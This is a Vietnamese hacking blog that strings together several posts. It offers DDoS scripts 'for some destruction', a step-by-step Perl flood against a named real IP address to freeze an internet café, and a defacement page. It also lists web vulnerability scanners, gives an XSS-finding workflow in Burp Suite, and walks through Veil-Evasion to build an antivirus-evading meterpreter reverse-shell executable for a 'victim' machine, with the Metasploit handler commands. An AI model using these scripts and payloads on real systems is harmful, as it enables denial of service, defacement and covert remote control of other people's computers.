Share hơn 40 code DDOS python cho anh em

Hôm nay max rảnh nên share cho m.n phá hoại chút , à mà nhắn tới mấy thanh niên trẩu nghịch ít thôi nhé !!!
DOWNLOAD HERE 

0 nhận xét:

Hướng dẫn truy cập DEEP WEB phần 1


0 nhận xét:

HƯỚNG DẪN LÀM ĐƠ CẢ TIỆM NET BY Jo3

Nguồn Jo3

để đánh dấu sự trở lại của Jo3
b1 : tải Perl và cài đặt (mình cài rồi)
tải code về mã hóa MD5 m.n giải ra nhé feaadce99387693dfb6a16ca483627dd
DOWNLOAD
b2 : mở cmd ra
đến ổ chứa thư mục perl thường là ổ c
cd Perl
mở file
jo3.pl 115.146.126.227 80 1000 300
như thế này
đó nhấn enter là xong nếu muốn thoát ấn ctrl + c
à mà pass của link download mình đã mã hóa md5 r nhé
ai muốn tải thì giả mã rồi down ( chống trẻ trâu )
END TUT

0 nhận xét:

SHARE code index Hacker

Share code index Hacker đơn giản nhưng đẹp :# để DEFACE


DOWNLOAD HERE

0 nhận xét:

14 công cụ mã nguồn mở giúp tìm kiếm lỗ hổng ứng dụng web!

Trong quá khứ nhiều website nổi tiếng đã bị hacker tấn công và gây ra những hậu quả nghiêm trọng gây mất uy tín cho doanh nghiệp. Việc kiểm tra an ninh cho website vô cùng quan trọng nhằm tránh những tổn thất trong tương lai. Việc đánh giá an ninh cho website cần có những chuyên gia có tay nghề với chi phí lớn ngoài ra cần phối hợp sử dụng các công cụ Application Security Scanner để nhanh chóng tìm và đưa ra các bản vá kịp thời đảm bảo an ninh cho các website.

Application Security Scanner là chương trình phần mềm cho phép kiểm tra các lỗ hổng an ninh trên website.

Application Security Scanner với các bản thương mại mang lại hiệu quả khá cao như web Acunetix, bên cạnh đó còn nhiều chương trình webscan mã nguồn mở mang lại hiệu quả khá cao giúp các chuyên gia hay lập trình viên nhanh chóng, đỡ mất thời gian tìm ra các lỗi an ninh trên hệ thống website.

Các bạn không nên nhầm lẫn giữa các chương trình mã nguồn mở với các chương trình miễn phí chúng hoàn toàn khác nhau. Mã nguồn mở là có kho mã nguồn về ứng dụng đó để người dùng có thể tùy biến theo nhiều kiểu khác nhau, có khi được phát triển thành ứng dụng bán lấy tiền có khi chia sẻ miễn phí nhưng tất cả đều phải công bố mã nguồn còn các ứng dụng miễn phí tất nhiên là free nhưng mã nguồn của nó thì chưa biết được.



1. Grabber:
Là một máy quét lỗ hổng ứng dụng web các lỗ hổng mà nó có thể phát hiện:

Cross site scripting
SQL injection
Ajax testing
File inclusion
JS source code analyzer
Backup file check
Công cụ này được đánh giá chạy khá nhanh với các website nhỏ và mất nhiều thời gian với các website lớn.
Cộng cụ này phát triển bằng ngôn ngữ python và không cung cấp trình giao diện nào cho người dùng. Các bạn có thể tùy biến hay nghiên cứu mã nguồn của nó.

Download it here: http://rgaucher.info/beta/grabber/
Source code on Github: https://github.com/neuroo/grabber

2. Vega:
Đây là công cụ phát triển dựa trên ngôn ngữ lập trình java có thể chạy trên nền tảng OSX, Window, Linux.
Công cụ Vega có thể tìm kiếm các lỗ hổng SQL injection, header injection, directory listing, shell injection, cross site scripting, file inclusion và một số lỗ hổng ứng dụng web khác.
Bạn có thể cài đặt số luồng quét tối đã mỗi giây khi bắt đầu kiểm tra 1 website.

Documentation: https://subgraph.com/vega/documentation/index.en.html
Download Vega: https://subgraph.com/vega/

3. Zed Attack Proxy:
Đây là công cụ được phát triển bởi AWASP chạy được trên nền tảng Window, OSX, Unix, Linux. Đây là công cụ đơn giản và dễ sử dụng.
Những tính năng của nó được liệt kê dưới đây:
Intercepting Proxy
Automatic Scanner
Traditional but powerful spiders
Fuzzer
Web Socket Support
Plug-n-hack support
Authentication support
REST based API
Dynamic SSL certificates
Smartcard and Client Digital Certificates support

Download ZAP : http://code.google.com/p/zaproxy/

4. Wapiti :
Đây cũng là một công cụ kiểm tra an ninh website tốt. Phương thức kiểm tra an ninh trên web của nó là quét các đường link và chèn giữ liệu test lên các đối tượng ( texbox...), nó hỗ trợ GET cà POST HTTP. Các lỗ hổng có thể được phát hiện bằng công cụ này:

File Disclosure
File inclusion
Cross Site Scripting (XSS)
Command execution detection
CRLF Injection
SEL Injection and Xpath Injection
Weak .htaccess configuration
Backup files disclosure

Đây là công cụ sử dụng dòng lệnh để thao tác nên dành cho các chuyên gia với các bạn mới bắt đầu thì sẽ khó sử dụng.

Download Wapiti with source code: http://wapiti.sourceforge.net/

5. W3af :
Công cụ kiểm tra an ninh web này được phát triển bằng ngôn ngữ python. Sử dụng công cụ này bạn có thể kiểm tra được hơn 200 lỗ hổng ứng dụng web bao gồm các lỗ hổng nguy hiểm như: SQL injection, Cross-Site Scripting.

Điều đặc biệt là công cụ này được đi kèm với giao diện đồ họa với các tùy chọn cho phép người dùng dễ dàng sử dụng.
Chi tiết hơn về công cụ này:

https://github.com/andresriancho/w3af/
Download it from the official website: http://w3af.org/

6. WebScarab :
Đây không phải một công cụ dành cho người mới bắt đầu vì nó được thiết kế cho những người hiểu biết tốt về HTTP và biết viết mã.
Ngoài các tính năng như các công cụ kiểm tra an ninh website khác công cụ có chức năng như con nhện tự động tìm kiếm các link của mục tiêu và đưa ra các kịch bản nhằm kiểm tra lỗ hổng trên các link đó.
Các lỗ hổng có thể được phát hiện bởi công cụ: SQL injection, XSS< CRLF và nhiều hơn nữa.

Source code of the tool is available on Github: https://github.com/OWASP/OWASP-WebScarab
Download WebScarab here: https://www.owasp.org/index.php/Cate...Scarab_Project

7. Skipfish :

Đây là công cụ viết bằng ngôn ngữ lập trình C. Nó được tối ưu để có thể chạy 2000 request mỗi giây mà không cần quá nhiều CPU máy tính nên tốc độ khá nhanh.
Công cụ này được chạy trên các nền tảng: OSX, Linux, Window.

Download Skipfish or code from GOogle Codes: http://code.google.com/p/skipfish/

8. Ratproxy:
Ratproxy cũng là một công cụ mã nguồn mở kiểm tra an ninh ứng dụng web. Nó hỗ trợ Linux, FreeBSD, MacOS X, và (Cygwin) môi trường Windows.

Công cụ này được thiết kế để khắc phục những vấn đề người dùng thường gặp phải khi sử dụng các công cụ proxy khác để kiểm tra an ninh. Nó có khả năng phân biệt giữa css và mã JavaScript. Nó cũng hỗ trợ giao thức SSL khi kiểm tra an ninh, có nghĩa là bạn cũng có thể xem dữ liệu khi website chạy SSL.

Bạn có thể đọc thêm về công cụ này ở đây: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Download http://code.google.com/p/ratproxy/

9. SQLMap :
Đây có lẽ là công cụ sử dụng phổ biến nhất và nhiều bạn biết về nó.
QALMap được viết trên ngôn ngữ lập trình Python và chạy bằng command line trên cả 3 nền tảng OSX, Linux, Window.
Bạn có thể tìm hiểu thêm về công cụ này tại:

https://github.com/sqlmapproject/sqlmap
Download SQLMap here: https://github.com/sqlmapproject/sqlmap

10. Wfuzz:

Wfuzz là một công cụ mã nguồn mở tự do có để kiểm tra an ninh ứng dụng web. Nó có thể được sử dụng để thực thi truy vấn GET và POST nhằm phát hiện các lỗ hổng an ninh như SQL, XSS, LDAP và nhiều thứ khác. Nó cũng hỗ trợ cookie fuzzing, multi-threading, SOCK, Proxy, Authentication, parameters brute forcing, multiple proxy...vvv
Đây là công cụ không hỗ trợ giao diện nên các bạn phải dùng dòng lệnh để sử dụng.

Download Wfuzz from code.google.com: http://code.google.com/p/wfuzz/

11. Grendel-Scan:
Đây là công cụ được phát triển bằng ngôn ngữ Java chạy được trên các nền tảng OSX, Linux và Window. Nó giúp các chuyên gia nhanh chóng tìm ra các lỗ hổng ứng dụng web.

Download the tool and source code: http://sourceforge.net/projects/grendel/

12. Watcher:
Khác với các công cụ khác đây là một chương trình thụ động dưới dạng add-on. Để sử dụng nó bạn cần cài đặt Fiddler trước rùi cài thêm add-on Watcher vào.
Là một máy quét thụ động nên nó không gây ảnh hưởng tới website hay cơ sở hạ tầng của website đó.

Download watcher and its source code: http://websecuritytool.codeplex.com/

13. X5S:
Đây của là một add-on của Fiddler để dùng được nó bạn cũng phải cài đặt Fiddler trước.

Download X5S and source code from codeplex: http://xss.codeplex.com/

14. Arachni:
Arachni là một công cụ mã nguồn mở được phát triển để cung cấp một môi trường thử nghiệm thâm nhập. Công cụ này có thể phát hiện các lỗ hổng bảo mật ứng dụng web khác nhau. Nó có thể phát hiện các lỗ hổng khác nhau như SQL Injection, XSS, Local File inclusion, remote file inclusion, unvalidated redirect và nhiều lỗ hổng khác.

Download this tool here: http://www.arachni-scanner.com/

Qua bài viết này các bạn có thể biết thêm một số công cụ giúp tìm kiếm lỗ hổng an ninh website. Bài viết mình chỉ giới thiệu sơ qua về các công cụ trên hy vọng các bạn sẽ có các bài chi tiết giới thiệu tầng công cụ đó để mọi người cùng tìm hiểu.

Nguồn: resources dot infosecinstitute dot com

0 nhận xét:

Phát hiện lỗ hổng XSS chính xác, nhanh gọn với Burp Suite và PhantomJS

XSS hiện nay là một loại lỗ hổng web ngày càng trở nên phổ biến và nguy hiểm. Trong bài này mình sẽ hướng dẫn các bạn cách tìm lỗ hổng web một cách nhanh chóng, tiện lợi và chính xác sử dụng Burp Suite và PhantomJS.

Yêu cầu:
  • Java 7.0 trở lên
  • PhantomJS (thông tin thêm tại http://phantomjs.org)
  • BurpSuite
  • Có kiến thức cơ bản về việc sử dụng Burp Suite và kiến thức về XSS
Trước tiên bạn cần tải file .jar này tại https://www.dropbox.com/s/fkuxovnhck...sValidator.jar . Lưu ý rằng file .jar này được xây dựng với điều kiện giả định rằng PhantomJS server đang được nghe trên 127.0.0.1:8093.

Cài đặt tiện ích mở rộng

Mở Burp Suite, điều hướng tới tab extender sau đó click nút Add, như hình dưới đây:



Chắc chắn rằng, loại của tiện ích mở rộng phải là Java, sau đó click Select file và chỉ tới đường dẫn file xssValidator.jar mà bạn vừa tải ở bước trên.



Click Add và một cửa sổ sẽ xuất hiện. Chắc chắn rằng không có bất kỳ một lỗi nào xảy ra khi click vào tab error. Nếu có lổi xảy ra thì khả năng cao là do bản java của bạn không phù hợp.

Sau khi thêm tiện ích mở rộng này, bạn sẽ nhìn thấy một items mới xuất hiện trong giao diện của Burp Suite Extensions, như hình dươi:



Chuẩn bị tấn công:

Tạo một Intruder attack cho yêu cầu mục tiêu. Xác định mục tiêu như bạn muốn và điều hướng tới tab Payload. Lựa chọn loại payload là extension-generated, như hình dưới:



Click vào Select Generator, và chọn XSS Validator Payload trong payload generator



Click Add và chọn Invoke Burp Extension thì menu thả xuống. Chọn XSS Validator processor, và click ok.



Xác định vị trí Payload, trong ví dụ này mình sử dụng file xsstest.php file có lỗ hổng XSS ở tham số GET.



Dưới tab options, điều hướng tới mục Grep - Match, và nhập ký tự "fy7sdufsuidfhuisdf"Ký tự này sẽ được trả về nếu lỗ hổng XSS được khai thác thành công.



Khởi động PhantomJS server, bằng việc điều hướng tới đường dẫn của phantomjs và khởi chạy phantomjs xss.js. Sau khi thực hiện lệnh này, bạn sẽ thấy như hình dưới:



Quay trở lại Burp Suite Intruder Attack và bắt đầu chạy tấn công. Payload mà kích hoạt thành công XSS sẽ được làm nổi bật bằng việc đánh dấu tích ở "fy7sdufsuidfhuisdf"flag, như hình dưới:



Để kiểm tra lại, bạn đơn giản chỉ cần lấy payload ở những dòng này và kích hoạt lại trên trình duyệt là ok.

0 nhận xét:

Hướng dẫn dùng Veil tạo payload bypass antivirus


1. Veil là gì?

Veil được biết đến như là một công cụ có khả năng vượt qua những trình diệt virus cơ bản được dùng trong hoạt động pentesting. Veil làm việc này bằng cách tạo ra một payloads ngẫu nhiên và duy nhất.Chúng ta có thể so sánh những payloads này giống nhưng những malware đa hình, khác nhau giữa host này với host kia. Những payloads này hay hơn những malware truyền thống ở chỗ nó có khả năng thay đổi chữ ký – điều mà một chương trình diệt virus thường dùng (tất nhiên là chương trình diệt virus còn dùng cách khác) để xác định malware. Những mã khai thác của Veil tương thích với hầu hết những công cụ pentest như Metasploit.
2. Dùng như thế nào?
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.
Đầu tiên là cài Veil vì nó không được tích hợp sẵn trên Kali Linux

root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
root@kali:~# unzip master
root@kali:~# cd Veil-Evasion-master/setup
root@kali:~/Veil-Evasion-master/setup# ./setup.sh
Chạy veil
root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
Bạn sẽ thấy một menu tương tác như thế này:
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Main Menu
39 payloads loaded
Available commands:
use                         use a specific payload
info                        information on a specific payload
list          list available payloads
update                 update Veil to the latest version
clean                     clean out payload folders
checkvt                check payload hashes vs. VirusTotal
exit        exit Veil
[>] Please enter a command:
Dùng thử những command để hiểu hơn về Veil, ví dụ như list, info..
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload information:
Name:                  python/meterpreter/rev_tcp
Language:           python
Rating:                  Excellent
Description:    pure windows/meterpreter/reverse_tcp stager, no
shellcode
Required Options:
Name                                   Current Value    Description
—-                                        ————-          ———–
LHOST                                  IP of the metasploit handler
LPORT                  4444       Port of the metasploit handler
compile_to_exe              Y              Compile to an executable
expire_payload               X             Optional: Payloads expire after “X” days
use_pyherion                   N             Use the pyherion encrypter
Để dùng một payload thì bạn chọn command use và mã số payloads có được từ lệnh list
[>] Please enter a command: use 26
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
Payload: python/meterpreter/rev_tcp loaded
Required Options:
Name                                   Current Value    Description
—-                                        ————-          ———–
LHOST                                  IP of the metasploit handler
LPORT                  4444       Port of the metasploit handler
compile_to_exe              Y              Compile to an executable
expire_payload               X             Optional: Payloads expire after “X” days
use_pyherion                   N             Use the pyherion encrypter
Available commands:
set         set a specific option value
info                        show information about the payload
generate             generate payload
back                       go to the main menu
exit        exit Veil
[>] Please enter a command: set LHOST 192.168.0.14
[>] Please enter a command: generate
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Press [enter] for ‘payload’
[>] Please enter the base name for output files: testPayload
[?] How would you like to create your payload executable?
1 – Pyinstaller (default)
2 – Pwnstaller (obfuscated Pyinstaller loader)
3 – Py2Exe
[>] Please enter the number of your choice: 1
err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec
176 INFO: Testing for ability to set icons, version resources…
189 INFO: … resource update available
191 INFO: UPX is not available.
1707 INFO: checking Analysis
1707 INFO: building Analysis because out00-Analysis.toc non existent
1707 INFO: running Analysis out00-Analysis.toc
1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww …
1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest
1720 INFO: Searching for file msvcr90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll
1720 INFO: Searching for file msvcp90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll
1720 INFO: Searching for file msvcm90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll
1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py
3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py
3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py
3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py
3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py
4082 INFO: Hidden import ‘encodings’ has been found otherwise
4084 INFO: Looking for run-time hooks
4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt
4911 INFO: checking PYZ
4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4911 INFO: building PYZ out00-PYZ.toc
5546 INFO: checking PKG
5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5546 INFO: building PKG out00-PKG.pkg
6628 INFO: checking EXE
6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing
6628 INFO: building EXE from out00-EXE.toc
6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================
[*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe
Language:                          python
Payload:                              python/meterpreter/rev_tcp
Required Options:      LHOST=192.168.0.14  LPORT=4444  compile_to_exe=Y
expire_payload=X  use_pyherion=N
Payload File:                      /usr/share/veil-output/source/testPayload.py
Handler File:                      /usr/share/veil-output/handlers/testPayload_handler.rc
[*] Your payload files have been generated, don’t get caught!
[!] And don’t submit samples to any online scanner! 😉
Nó nhắc các bạn là đừng có submit payload này lên mấy trang scan online kìa Shy
Xong, như vậy bạn đã có 1 file exe có khả năng bypass được một số antivirus (hi vọng thế)
Bước tiếp theo là copy file đó lên máy victim và chạy nó. Trên Kali Linux chúng ta sẽ mở một cái handler cho cái reverse tcp
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.14
LHOST => 192.168.0.14
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
Theo: http://forum.ceh.vn/Huong-dan-dung-Veil-tao-payload-bypass-antivirus-thread-7431-post-28093.ceh#pid28093

0 nhận xét:

Copyright © 2013 2 USD Hình Con Chó 2018|TienLiXiTet.Com|0966.85.0966